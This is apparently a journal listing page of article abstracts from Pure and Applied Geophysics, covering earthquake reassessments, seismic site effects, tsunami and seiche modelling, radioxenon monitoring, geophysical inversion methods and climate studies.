Computations are performed using the hybrid technique, which is based on the mode summation and finite difference methods. These consider the source, propagation and local site effects. The approach is fully justified by the detailed knowledge of the physical parameters of the local subsoil, based on models inferred from noise cross-correlation measurements between two receivers. Moreover, the propagation model is validated through the fitting of synthetics with a recording of a moderate earthquake at the historical center of Napoli (29 December 2013, MW = 5.2) close to the seismogenic fault responsible for the 1688 earthquake. Ground motion is computed along a two-dimensional section crossing the historical center for the seismogenic sources as known from the literature. A consistency exists between the computed peak ground acceleration and intensity data if we attribute higher moment magnitudes of 7 to the 1688 earthquake and 7.3–7.4 to the 1456 earthquake. In light of the uncertainties related to the macroseismic intensities and estimated magnitudes of these historical events, and the relevant masonry heritage of the historical center of Napoli, the highest values of the computed ground motion are suggested for seismic retrofitting of the masonry heritage. A scenario earthquake like those of 1688 (MW = 7) and 5 December 1456 (MW = 7.4) is predicted by the seismic code for limit states of life safety or collapse, depending on the site and the true material damping.

Updated: 2020-01-31

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-30
Nikolaos S. Melis, Emile A. Okal, Costas E. Synolakis, Ioannis S. Kalogeras, Utku Kânoğlu

Abstract: We present a modern seismological reassessment of the Chios earthquake of 23 July 1949, one of the largest in the Central Aegean Sea. We relocate the event to the basin separating Chios and Lesvos, and confirm a normal faulting mechanism generally comparable to that of the recent Lesvos earthquake located at the northern end of that basin. The seismic moment obtained from mantle surface waves, M0 = 7 × 10^26 dyn cm, makes it second only to the 1956 Amorgos earthquake. We compile all available macroseismic data, and infer a preference for a rupture along the NNW-dipping plane. A field survey carried out in 2015 collected memories of the 1949 earthquake and of its small tsunami from surviving witnesses, both on Chios Island and nearby Oinousses, and on the Turkish mainland. While our results cannot help discriminate between the two possible fault planes of the 1949 earthquake, an important result is that both models provide an acceptable fit to the reported amplitudes, without the need to invoke ancillary sources such as underwater landslides, in contrast to the case of other historical tsunamis in the Aegean Sea, such as the 1956 Amorgos and 1948 Rhodos events.

Updated: 2020-01-31

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-27
Vansittee Dilli Rao, Deepankar Choudhury

Abstract: This study attempts to estimate the probability of the occurrence of large earthquakes (Mw ≥ 5.5) in the northwestern part of Haryana state, India, where a new nuclear power plant (NPP) is going to be constructed in the near future. First, an earthquake catalogue is developed for the period 1803–1986, and five stochastic models, namely lognormal, Weibull, gamma, Rayleigh, and double exponential, are then applied to the past earthquake data.
The performance of these models is checked using three statistical tests; the lognormal, Weibull, and Rayleigh models are found to produce good approximations for this region, whereas the double exponential and gamma models yield intermediate and poor results. Hence, cumulative and conditional probabilities and related hazard curves for future earthquakes are estimated using the most suitable models. The cumulative probability of the occurrence of an earthquake (Mw ≥ 5.5) since the last event (1986) reached 0.95–0.98 as of 2018. The conditional probability of the occurrence of such an earthquake reaches 0.90–0.95 about 9–12 years from now (2027–2030), when the elapsed time will be 32 years (i.e., since 2018). The probability of earthquakes with different threshold magnitudes is then estimated, and based on the outcome of this investigation, earthquake magnitudes are classified from occasional (Mw ≤ 6.1) to very rare events (Mw ≥ 7.6) that this region may experience in the future. The findings of this study will be considered in seismic hazard assessment, liquefaction hazard assessment, and earthquake-resistant design of NPP components.

Updated: 2020-01-27

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-27
A. Ringbom, A. Axelsson, O. Björnham, N. Brännström, T. Fritioff, H. Grahn, S. Hennigor, M. Olsson

Abstract: An analysis of a data set consisting of 3 years of high time resolution radioxenon stack measurements from the three nuclear reactors at the Forsmark nuclear power plant in Sweden, as well as measurements of atmospheric radioxenon in Stockholm air, 110 km away, is presented. The main causes of the stack releases, such as the function of the xenon mitigation systems, the presence of leaking fuel elements, and reactor operations such as shutdown and startup, are discussed in relation to the stack data. The relation between radioxenon releases and reactor operation is clearly illustrated by the correlation between the stack measurements and thermal reactor power. In general, the isotopic ratios of the Stockholm measurements, which are shown to mainly originate from Forsmark releases, agree well with the stack measurements and with a modeled reactor operational sequence. Results from a forward atmospheric dispersion calculation agree very well with observed plume arrival times and widths and, with some exceptions, also with absolute activity concentrations. The results illustrate the importance of detailed knowledge of radioxenon emissions from nuclear power plants when interpreting radioxenon measurements for nuclear test ban verification, and provide new input to this kind of analysis. Furthermore, they demonstrate the possibility of using sensitive radioxenon detection systems to remotely detect and verify reactor operation.

Updated: 2020-01-27

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-27
Ruey-Der Hwang, Cheng-Ying Ho, Tzu-Wei Lin, Wen-Yen Chang, Yi-Ling Huang, Cai-Yi Lin, Chiung-Yao Lin

Abstract: A systematic analysis of the source duration (τ) and seismic moment (M0) for seismogenic earthquakes (MW 5.5–7.1) in the Taiwan region was completed by using a teleseismic P-wave inversion method. Irrespective of source self-similarity, the M0–τ relationship derived in this study had a power-law form, namely M0 ∝ τ³, under the assumption that ΔσVr³ is constant following a circular fault model (Δσ: static stress drop; Vr: rupture velocity).
For Taiwan's earthquakes, the derived M0–τ relationship not only provides information to predict the source duration of large earthquakes, but also probes the rupture features of seismogenic earthquakes. That is, there are different rupture patterns for earthquakes, but the product ΔσVr³ remains nearly constant.

Updated: 2020-01-27

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-17
Francoise Courboulex, E. Diego Mercerat, Anne Deschamps, Sébastien Migeon, Marion Baques, Christophe Larroque, Diane Rivet, Yann Hello

A broadband seismological station (PRIMA) installed offshore of Nice airport (southeastern France) reveals a strong amplification effect of seismic waves. The PRIMA station was in operation for 2 years (9/2016 to 10/2018) on the outer shelf at a water depth of 18 m. Situated at the mouth of the Var River, this zone is unstable and prone to landslides; a catastrophic landslide and tsunami already occurred in 1979, causing 10 casualties. Given the level of seismicity of the area, it is important to infer the impact of an earthquake on this zone. We analyze the recordings of earthquakes and seismic noise at the PRIMA station by comparing them to nearby inland stations. We find that the seismic waves are strongly amplified at PRIMA at some specific frequencies (with an amplification factor greater than 10 at 0.9 Hz). Using geological and geophysical data, we show that the main amplification frequency peak (at 0.9 Hz) is due to the velocity contrast between the Pliocene sedimentary layer and fine-grained sediments dated from the Holocene, at about 100 m depth. This velocity contrast is also present along the Var valley, but the level of amplification detected at the PRIMA station is larger. Using numerical simulations of seismic waves in a 2D model that accounts for the pinch-out geometry related to the termination of the Holocene sedimentary layer, we can partially explain this amplification. This offshore site effect could have a crucial impact on the triggering of a submarine landslide by an earthquake in this region. More generally, this effect should be taken into account in the modeling of landslides and induced tsunamis triggered by seismic waves.

Updated: 2020-01-17

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-17
Xuliang Feng, Shengrong Liu, Ruikun Guo, Pengfei Wang, Jinai Zhang

Depicting the basement relief of a sedimentary basin with gravity data is vital to predicting the hydrocarbon potential of the basin and guiding exploration work. We have developed a gravity inversion method to estimate the depth to the blocky basement of a sedimentary basin. The basement rocks are assumed to be homogeneous and of uniform density, while the density of the sediment over the basement increases exponentially with depth. The density contrast between the sediment and the basement at the surface varies horizontally, and the decay factor of the density contrast is also nonuniform. The sediment above the basement is divided into vertically juxtaposed prisms, and the depth of the bottom of each prism represents the depth to the basement and is the parameter to be estimated. The L0 norm is introduced to limit the gradient of the parameter vector to obtain the model constraint function. We then establish the objective function for inversion by combining the gravity data misfit function, the known depth constraint function, and the model constraint function. The inversion is performed by minimizing the objective function using the nonlinear conjugate gradient algorithm.
The inversion method is evaluated using a 2D and a 3D sedimentary basin model. The results show that our proposed method is capable of delineating the blocky basement relief of a sedimentary basin, and the result is sharper than that obtained using the L1 norm constraint. The method is applied to real data from the western part of the Zhu 1 depression in the Pearl River Mouth Basin, northern South China Sea. The solution reveals a strongly faulted basement, which is in accordance with the known tectonic information indicating that the basin is a fully developed graben.

Updated: 2020-01-17

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-17
Kaya M. Wilson, Hannah E. Power

Tsunami modelling is widely used to estimate the potential impacts of tsunamis. Models require a tide input, which can be either static, representing a specific tide level such as Highest Astronomical Tide, or dynamic, representing a moving tide level. Although commonly used, static tide inputs do not account for tsunami–tide interactions, which are known to be non-linear and more significant in estuaries than on the open coast. To demonstrate the differences between tsunami models using static or dynamic tide inputs, a series of models were run for two New South Wales estuaries, Sydney Harbour and Port Hacking. Model boundary conditions phased an MW 9.0 Puysegur source tsunami with multiple tide scenarios. Fourteen distinct scenarios with dynamic tides were created by phasing the largest tsunami wave peak at regular intervals across the tidal range. For comparison, static tide models were run using equivalent tide levels. The situations where static tide models provide results comparable to or more conservative than dynamic tide models are the first 1–2 h after tsunami arrival, at high tides, and in comparison with dynamic falling tides at the same tide level. Differences are most apparent upriver of geomorphological constrictions. The effects of geomorphological constrictions were further examined using idealised model setups with a constriction variable. Results show that constrictions affect downriver maximum water levels, tsunami wave heights, upriver water accumulation, and inundation maxima and distributions. These results have implications for estuaries vulnerable to erosion at constriction sites during a tsunami event.

Updated: 2020-01-17

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-17
D. T. Pugh, P. L. Woodworth, E. M. S. Wijeratne

Abstract: Sea level records have been obtained from a dozen tide gauges deployed around the Shetland Islands, and the high-frequency components of each record have been analysed to determine how the amplitudes and periods of seiches vary from place to place. We have found that seiches occur almost everywhere, although with different periods at different locations, and sometimes with amplitudes exceeding several decimetres. Spectral analysis shows that two or more modes of seiching are present at some sites. The study attempts to explain, with the help of a numerical model, why seiches with particular periods are observed at each location, and what forcings are responsible for them. In particular, we have revisited an earlier study of seiches on the east coast of Shetland by Cartwright and Young (Proc R Soc Lond A 338:111–128, 1974) and find no evidence to support the theory that they proposed for their generation.
In addition, we have investigated how often and why the largest seiche events occur at Lerwick (with trough-to-crest wave heights of about 1 m), taking advantage of its long sea level record. Seiches (and other types of high-frequency sea level variability) are often ignored in studies of sea level changes and their coastal impacts. And yet they can be large enough to contribute significantly to the extreme sea levels that have major impacts on the coast. Therefore, our Shetland research serves as a case study of the need to have a fuller understanding of the climatology of seiches for the whole world coastline.

Updated: 2020-01-17

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-17
Evangelos Mouzakiotis, Vassilios Karastathis, Nikolaos Voulgaris, Panagiotis Papadimitriou

Elastic 3D wave-field simulations were performed in the seismically active region of the eastern Gulf of Corinth, in the area of the city of Loutraki. A new methodology was tested with the aim of performing multiple simulations for a large variety of realistic sources located around the study area, employing 3D finite-difference modeling that uses matrix operations for the calculation of the spatial velocity and stress derivatives. The new methodology proved quite efficient in simulating the near-surface 3D site effect of the study area, greatly reducing the simulation time and thus allowing the use of 3D finite-difference modeling for a large number of simulations. The complex geological features of the study area were obtained by performing multiple passive MASW surveys within the busy urban area of Loutraki. By processing the acquired geophysical data, a highly inhomogeneous near-surface velocity structure of the study area was obtained and implemented in the 3D wave-field simulations. The near-surface amplification caused by the 3D subsurface structure proved highly significant for the area of Loutraki, with high spectral amplification compared to that caused by an equivalent 1D model of the area. The dominant frequencies of the spectral amplification for the 3D model were also confirmed by processing HVSR measurements taken in the area. Finally, we also investigated how the propagation direction affects the near-surface amplification.

Updated: 2020-01-17

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
Jon B. Fletcher, John Boatwright

Abstract: Power spectra of shear waves for eighteen earthquakes from the Anza-Imperial Valley region were inverted for source, mid-path Q, site attenuation and site response. The motivation was to determine whether differences in site attenuation (parameterized as t* = r/(cQ), where r is the distance along the ray path near the site, c is the shear velocity and Q is the quality factor that parameterizes attenuation) and site response could be correlated with residuals in peak values of velocity or acceleration after removing the effect of distance-dependent attenuation. We decomposed spectra of S-waves from the horizontal components of 18 earthquakes from 2010 to 2018 into a common source for each event with ω^−2 spectral fall-off at high frequencies, and then projected the residuals onto path and site terms following the methodology of Boatwright et al. (Bull Seismol Soc Am 81:1754–1782, 1991). The site terms were constrained to have an amplification at a particular frequency governed by VS30 at two of the sites, which had downhole shear-wave logs.
The 18 events, 3 < M < 4, had moments between approximately 10^20 and 10^22 dyne-cm, and stress drops between 1 and 100 bars. Average mid-crust attenuation had a Q of 844, reflecting the average path through the crystalline rock of the San Jacinto Mountains. The t* for each station corresponded to the geologic environment: stations on hard rock had low t* (e.g. stations KNW, PFO and RDM), a station in the San Jacinto fault zone (station SND) had a moderate t* of 0.035 s, and stations in the Imperial Valley usually had higher t* values. Generally, t* correlated with average amplification, suggesting that sites characterized by low surface velocities and higher attenuation also have more amplification in the 1–6 Hz band. Residuals of peak values were determined by subtracting the prediction of Boore and Atkinson (2008). There is a correlation between average amplification and peak velocity, but not peak acceleration. Interestingly, there is less scatter at high values of amplification, although there is also less data there. Scatter in values of peak velocity and peak acceleration is higher at shorter durations than at longer ones. When using a frequency-dependent form for Q, variances are higher, sometimes much higher; the dataset does not support frequency-dependent Q, unlike results from the Imperial Valley and northeastern North America.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
C. Pro, E. Buforn, A. Udías, J. Borges, C. S. Oliveira

The 28 February 1969 (Ms 8.0) Cape St. Vincent earthquake is the largest shock to have occurred in the region after the Lisbon earthquake of 1755. However, study of the rupture process has been limited by the characteristics of the available seismic data, which were analogue records that were generally saturated at both regional and teleseismic distances. Indeed, these data consist of just one accelerograph record at the 25th April Bridge in Lisbon (Portugal) and the observed intensities in the Iberian Peninsula and the northern part of Morocco. We have used these data to simulate the distribution of PGV (Peak Ground Velocity) for the 1969 event at regional distances (less than 600 km) using a 3D velocity model. PGV values are very important in seismic hazard studies. The velocity model and the methodological approach were tested by comparing synthetic and observed ground velocities at regional distances for two recent, well-studied earthquakes that occurred in this region, namely the 2007 (Mw = 5.9) and 2009 (Mw = 5.5) earthquakes. By comparing the synthetic and observed PGA (Peak Ground Acceleration) at Lisbon, the focal depth of the 1969 earthquake was estimated at 25 km and the seismic moment at 6.4 × 10^20 N m (Mw = 7.8). With these parameters, PGV values were obtained for 159 sites located in the Iberian Peninsula and the northern region of Morocco for which felt intensity values are available. Using different empirical relations, instrumental intensity values were calculated and compared with the felt intensities. As a result, the synthetic PGV values obtained in this study for the 1969 earthquake could be used as reference values, and the methodological approach would allow the PGV and intensity to be simulated for other events in the region.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
Yanjun Dong, Fanxi Liao, Dongzhen Wang, Chengchen Du, Kai He

Here, we show the present-day tectonic stress field and the regional GPS velocity and strain rate fields in Hubei Province, central China.
Our results are calculated from digital observation data from 01 January 2010 to 31 December 2017, using the seis-CAP, P-wave first motion, and grid search methods and the software GAMIT/GLOBK 10.4. The results show that the P axis azimuths of the focal mechanism solutions, the principal compressional stress field, and the regional velocity and strain rate fields are conformably compressional in a NW–SE direction. The regional stress shape ratio R values are relatively low, and the faults are dominantly compressive-shear faults. The average velocity modulus for the GPS observation stations in western Hubei is 6.1 mm/a, which is higher than that in eastern Hubei (5.4 mm/a). The average velocity modulus in the Jianghan Basin interior is relatively low (4.4 mm/a), while that in the northwestern Jianghan Basin is higher (7.6 mm/a). The strain rate field is characterized by NW–SE compression accompanied by NE–SW tension. The results suggest that the present-day crustal movement in Hubei Province is mainly controlled by collisions with the Indian Plate in the west and the Philippine Plate in the east, and by the consequent crustal shortening induced by western Hubei wedging into the Jianghan Basin. Further, the resistance of the thrust-and-fold belt in eastern Hubei contributes to the principal compressional movement in the study area. The T axis azimuth of the focal mechanism solutions is consistent with the direction of the principal extensional stress field. In the central and northern Jianghan Basin, the R values are relatively high, the faults are mainly transtensional, and the crustal deformation is mainly extensional, which may be affected by the denudation, thinning and rapid rebound of the Dabie Orogen, resulting in tectonic extrusion and flow in the Jianghan Basin towards both the NE and SW sides.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
Aleksandar Valjarević, Dejan Filipović, Miško Milanović, Dragana Valjarević

Sea surface salinity is one of the most important chemical properties of seawater. Climatic variables included in a new view of salinity distribution at the global scale were used in this research. For the purpose of this research, newly updated climate parameters for the period until 2100 were used along with the CMIP5 climatological model. The new distribution of surface salinity may indicate water desalination and energy potential. Such a map can be useful in the determination of new littoral areas or of fishermen's routes. The data are presented in GeoTIFF raster format with a resolution of 0.1. The map can be updated with climatological parameters as medium climate change effects are obtained. Some places in the world's seas have low salinity, others high. Salinity increases in accordance with the increase of precipitation and decreases with its decrease. The paper presents the following maps: a world salinity map with no climate change; a moderate one, if the temperature increases by 2.0 °C by 2100; and a high one, if the increase in temperature is between 2.0 °C and 5.0 °C. The three scenarios were chosen to show updated maps of world salinity in relation to climate change effects.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
Usha Devi, M. S. Shekhar, G. P. Singh, S. K. Dash

Abstract: Dynamical and statistical models are operationally used by the Snow and Avalanche Study Establishment (SASE) for winter precipitation forecasting over the Northwest Himalayas (NWH).
In this paper, a statistical regression model developed for the seasonal (December–April) precipitation forecast over the Northwest Himalaya is discussed. After analysis of the various atmospheric parameters that affect winter precipitation over the NWH, two parameters were selected: the North Atlantic Oscillation (NAO) and Outgoing Longwave Radiation (OLR) over specific areas of the North Atlantic Ocean. A set of 27 years (1990–1991 to 2016–2017) of observed precipitation data and parameters (NAO and OLR) is utilized. Of the 27 years of data, the first 20 years (1990–1991 to 2009–2010) are used for the development of the regression model, and the remaining 7 years (2010–2011 to 2016–2017) are used for validation. Precipitation over the NWH is mainly associated with Western Disturbances (WDs), and the results of the present study reveal that the NAO during SON has a negative relationship with WDs and also with winter precipitation over the same region. Quantitative validation of the multiple regression model shows a good Skill Score of 0.79, an RMSE-to-observations standard deviation ratio (RSR) of 0.45, and a bias of −0.92.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
Chong Liu, LiZhen Cheng, Xueping Dai, Mamadou Cherif Diallo

The long-term sustainable development of mineral exploration under cover requires effective deep detection techniques and methods. Starting from an enhancement of the surface-borehole time-domain electromagnetic (TEM) technique, the present study established a new relationship between the pulse width (Δ), the target time constant (τ) and the measurement time (t). Under certain conditions, the new formula has been extended to all TEM systems that use square or trapezoidal waveforms. A series of numerical simulations illustrates the consistent behavior of the surface-borehole, ground and airborne TEM fields. The new relationship allows us to evaluate optimal pulse widths for different off-times and helps with TEM survey design.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15

Abstract: The investigated region is located in the western desert fringes of the Nile Valley, which requires groundwater studies related to the many land reclamation projects. The key objective of this paper is to estimate the qualitative and geometrical features of the investigated aquifer. The use of 60 vertical electrical soundings and time-domain electromagnetic soundings allows us to suggest one possible model of the geometrical features of the local aquifer. Hydrogeological monitoring has been undertaken to investigate the current groundwater situation in the Gallaba plain; such monitoring has not been undertaken in detail before. The results show that the investigated region has high groundwater potential in two main aquifers belonging to the Pleistocene: a shallow fresh-water aquifer and a deep brackish-water aquifer. The lithological and structural elements contribute mainly to recharging and storing the groundwater in the western part of the River Nile in the Kom Ombo graben. The geochemical properties of the groundwater of the studied aquifers reflect meteoric water, which is fresh to slightly brackish. The small amount of groundwater salinity arises from silicate weathering and evaporation processes occurring in the aquifer matrix. Moreover, most of the studied groundwater samples are unfit for human consumption.
Such samples are, however, very satisfactory for livestock and poultry purposes, and they can be used for irrigation with modern, improved irrigation methods, e.g. sprinkler and drip methods. Furthermore, the hydrogeological monitoring of the concerned area indicates that it has high groundwater potential, which will support its sustainable development.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
Ling Zhang, Bin Hu, Zhuo Jia, Yi Xu

Abstract: The Lunar Penetrating Radar (LPR) carried by the Chang'E-3 (CE-3) mission is an important application of radar in lunar exploration. The LPR aboard the Yutu rover offers a significant opportunity to detect information on the regolith and the subsurface structure at the landing site. On the basis of a data processing flow, a low-frequency radar image has been made available for mapping the subsurface structure. The noise-contaminated data pose a huge challenge for geological stratification and interpretation. To overcome the limitation imposed by noise, we adopt the shearlet transform as a promising tool for data analysis and noise attenuation. The different distributions of the noise and signal in the shearlet domain decrease the difficulty of noise attenuation. To optimize the denoising strategy, we replace the conventional hard threshold with a locally adaptive thresholding function. The quality of the processed data is improved, which is helpful for geological stratification and interpretation. Finally, by combining these data with the regional geology and previous research, especially the LPR data, we can provide an interpretation of LPR CH-1.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-15
Jiayuan Huang, Robert L. Nowack

Machine learning using convolutional neural networks (CNNs) is investigated for the imaging of sparsely sampled seismic reflection data. A limitation of traditional imaging methods is that they often require seismic data with sufficient spatial sampling. Using CNNs for imaging, good results can still be obtained even if the spatial sampling of the data is sparse. Therefore, CNNs applied to seismic imaging have the potential of producing improved imaging results when spatial sampling of the data is sparse. The imaged model can then be used to generate more densely sampled data and in this way be used to interpolate either regularly or irregularly sampled data. Although there are many approaches for the interpolation of seismic data, here seismic imaging is performed directly with sparse seismic data once the CNN model has been trained. The CNN model is found to be relatively robust to small variations from the training dataset; for greater deviations, a larger training dataset would likely be required. If the CNN is trained with a sufficient amount of data, it has the potential of imaging more complex seismic profiles.

Updated: 2020-01-15

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-08
Hakki Baltaci

This study investigates the atmospheric mechanisms that triggered the flash-flood event in the Thrace Basin of Turkey on November 27, 2018. Underestimation of the extreme precipitation amounts by global and regional NWP models (i.e. ECMWF, ALARO, WRF), together with other meteorological difficulties in weather forecasting (i.e. complex topography, land–sea interactions), prevented disaster risk reduction before the event occurred.
Detailed synoptic, thermodynamic, in-situ, and remote sensing analyses showed that a significant amount of moisture was transferred to the atmosphere (from the ground to 300 hPa) during the afternoon hours as a consequence of the excessive warmth of the sea surface temperatures (SSTs) of the Aegean Sea (16.5 °C at Ayvacik-Gulpinar, 0.9 °C above its long-term normal). Strong southwesterly winds associated with the slow meridional movement of a mid-latitude cyclone from its origin to the Eastern Mediterranean (EM) enabled the transfer of relatively warm, moist air to the land areas of the Thrace region (> 300 km fetch distance). Strong updraft and instability conditions developed a supercell that resulted in lightning (63 cloud-to-ground and 59 intra-cloud strokes in total) and heavy rainfall, especially over the Suloglu, Kofcaz, and Edirne settlements, with 12-hour totals of 160.0, 123.0, and 97.4 mm (rainfall return period ~100 years), respectively. The flash-flood event caused numerous injuries and the death of one person, and damaged automobiles, houses, crops, and infrastructure in Edirne and its neighboring settlements. Of the Showalter, K, Total of Totals, SWEAT, and CAPE instability indices, SWEAT is the most appropriate for representing the high possibility of occurrence of severe thunderstorms over Edirne province, owing to the low-level moisture, warm air advection, and low- and mid-level wind speed terms in its equation.

Updated: 2020-01-08

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-08
Dongyong Zhou, Xingyao Yin, Zhaoyun Zong

Abstract: A porous medium is composed of a rock skeleton and pore fluids, and seismic wave propagation in it produces complex and diverse variations influenced by the pores and the fluids filling them. The study of closed-form expressions for the plane-wave reflection and transmission coefficients at a planar interface between porous media is very important for analyzing the properties of pores and their fluids and eventually revealing underground oil-bearing reservoirs. In this paper, based on the relationships among seismic wave functions, displacements and stresses in porous media, an exact equation for the plane-wave reflection and transmission coefficients of a normally incident fast P-wave is first derived. Considering the characteristics of the parameters in the coefficient matrix of the exact equation, closed-form expressions with clear geophysical meaning are further derived, which include three parts: the rock skeleton term, the fluid–solid coupling term and the pore fluid term. Through the establishment of two porous media models, the influence of each term in the approximate expression on the reflection characteristics of a fast P-wave is analyzed. Different approximate expressions for the reflection coefficient of a fast P-wave can be selected for oil and gas prediction in different reservoirs, which lays a foundation for the identification of gas, oil and brine.

Updated: 2020-01-08

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-08
Zhencong Zhao, Jingyi Chen, Xiaobo Liu

Seismic numerical modeling in the presence of surface topography has become a valuable tool for characterizing seismic wave propagation in basin or mountain areas. Given the advantages of frequency-domain seismic wavefield simulations (e.g., easy implementation of multiple sources and straightforward extension to include attenuation factors), we propose a frequency-domain finite-difference seismic wavefield simulation in 2D elastic media with an irregular free surface.
In the frequency domain, we first transform the second-order elastic wave equations and the first-order free surface boundary conditions from the Cartesian coordinate system to a curvilinear coordinate system. Then we apply the complex frequency-shifted perfectly matched layer (CFS-PML) absorbing boundary condition to the second-order elastic wave equations in curvilinear coordinates. To better couple the free surface boundary conditions with the CFS-PML absorbing boundary condition, we also apply the complex coordinate stretching method used in CFS-PML to the free surface boundary conditions in curvilinear coordinates. In the first numerical test, the comparison of the seismograms calculated by our algorithm with an analytical solution indicates that our algorithm can accurately simulate the seismic wavefield in the frequency domain. Finally, we choose three more elastic models with different types of surface topography to further characterize seismic wave propagation.

Updated: 2020-01-08

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-08
Baohui Men, Zhijian Wu, Huanlong Liu, Wei Tian, Yong Zhao

Climate change has a profound impact on the production and life of the people in the Beijing–Tianjin–Hebei region. Precipitation and temperature are regarded as two basic components of climate. This study investigated the spatial and temporal characteristics of precipitation and temperature over the region from 1960 to 2013. Different methods were used to analyze temporal variation, and the results were mutually verified. Wavelet analysis was adopted to analyze abrupt changes in precipitation and temperature, and the empirical orthogonal function decomposition method was utilized to analyze their spatial distribution. The study yielded three major findings. First, inter-annual decreases and increases of precipitation appeared alternately in the region, while temperature rose significantly over the last 50 years, apart from a slow reduction in the late 1970s. Second, the spatial distribution characteristics of precipitation vary with distance from the ocean, and the increasing trend of temperature in the Beijing-centered region was more obvious than that in areas away from the sea. Third, changes in precipitation and temperature show strong correlations: when temperature increased, rainfall decreased, and when temperature changed abruptly, precipitation also changed rapidly. The results can guide local agricultural production and provide a reference for further study of climate change.

Updated: 2020-01-08

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-08
Akram Aziz, Tamer Attia, Mahmoud Hanafi

Updated: 2020-01-08

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-08
Zhu Zhang, Kenneth G. Dueker

The transition zone water filter model (Nature 425(6953), 39–44; 2003) predicts that a hydrous partial melt layer is only actively produced in a region of upwelling mantle. We test the transition zone water filter model via stacking of P-to-S converted receiver functions using the IRIS-PASSCAL RISTRA (Colorado Plateau/Rio Grande Rift Seismic Transect Experiment) array. Assuming that the high velocity regions found at the northwest and southeast ends of the array at 350–440 km depth by teleseismic velocity tomograms, e.g. Schmandt and Humphreys (Earth and Planetary Science Letters 297(3–4): 435–445; 2010), are cold and sinking vertically, the 410-km low velocity layer should be absent in these regions.
The receiver function stacking profiles find the mean depths of the two primary discontinuities at 417 ± 7.1 km for the 410-km discontinuity and 667 ± 8.2 km for the 660-km discontinuity. The average arrival amplitudes with respect to the Z component are 3.0% for the 410-km discontinuity, 2.8% for the 660-km discontinuity, and −1.8% for the 410-km low velocity layer. The stacked Pds image shows the 410-km low velocity layer absent at ~350 to 390 km in the high velocity regions, but present in the low velocity region. A correlation plot of the sum of the 410-km low velocity arrival amplitudes against the P-wave perturbation finds a positive linear relationship. Therefore, our findings provide seismic evidence for the transition zone water filter model at a small scale.

Updated: 2020-01-08

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-08
Fuqiang Shi, Shaoyang Li, Marcos Moreno

Abstract: Crustal faults at subduction zones show evidence of activity over geological time, but at the scale of the earthquake cycle the mechanical behavior of these faults is not fully understood. Here we construct 2-D viscoelastic models constrained by both horizontal and vertical GPS-derived interseismic velocities to investigate the contributions of subduction zone locking, viscous mantle flow, and upper plate faulting to surface deformation in the Central Andes, and the interrelations between them. The main pattern of horizontal velocities can be explained by a combination of locking degree and viscous flow, whereas the vertical signal is found to be essential for estimating the locking depth. A sharp deformation gradient near the major back-arc fault suggests active interseismic shortening across this structure. We further conduct mechanical viscoelastic models with a frictional back-arc fault to analyze its displacement and activation conditions. Our results suggest that the back-arc fault is creeping at ~3 mm/year and that its motion is mainly driven by the interseismic viscous mantle flow, which spreads plate tectonic stresses broadly across the continent. Moreover, the frictional strength of the back-arc fault must be remarkably weak, and its mechanics redistributes the interseismic deformation and shortens the continental plate in the Central Andes. Geological estimates suggest that the long-term shortening rate at the back-arc fault is ~10 mm/year, implying that this structure can accumulate ~7 mm/year of slip deficit and confirming its seismic potential.

Updated: 2020-01-08

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2020-01-03

This study uses ground penetrating radar (GPR) data as constraints in the inversion of radio-magnetotelluric (RMT) data, to provide an improved model at shallow depth. We show that modification of the model regularization matrix using all GPR common-offset (CO) reflections can mislead the constrained inversion of RMT data. To avoid such problems, common mid-point (CMP) GPR data are translated to a resistivity model by introducing a new petrophysical relationship based on a combination of Topp's and Archie's equations. This model is updated through a semi-iterative method and is employed as an initial and prior model in the subsequent inversion of RMT data. Finally, a water content model that fits the GPR CMP and RMT data is derived from the resistivity model computed by the constrained inversion of RMT data. To assess the proposed scheme, it is applied to a synthetic data set. Then, real RMT data collected along an 870 m-long profile across a known aquifer situated north of Heby, central Sweden, are inverted.
By removing the smoothness constraints across GPR CO interfaces or using the CMP-based inversion, thick (> 10 m) vadose and saturated zones are resolved and shown to correlate with logs from nearby boreholes. Nevertheless, the application of our CMP-based inversion was the only scheme efficient enough to retrieve the thin (~3 m) saturated zones and the water table at a depth of 7–15 m in the RMT models. The estimated models of water content are in good agreement with the available hydrogeological information in the study area.

Updated: 2020-01-04

• Pure Appl. Geophys. (IF 1.466), Pub Date: 2019-12-23
Xiaolei Tu, Michael S. Zhdanov

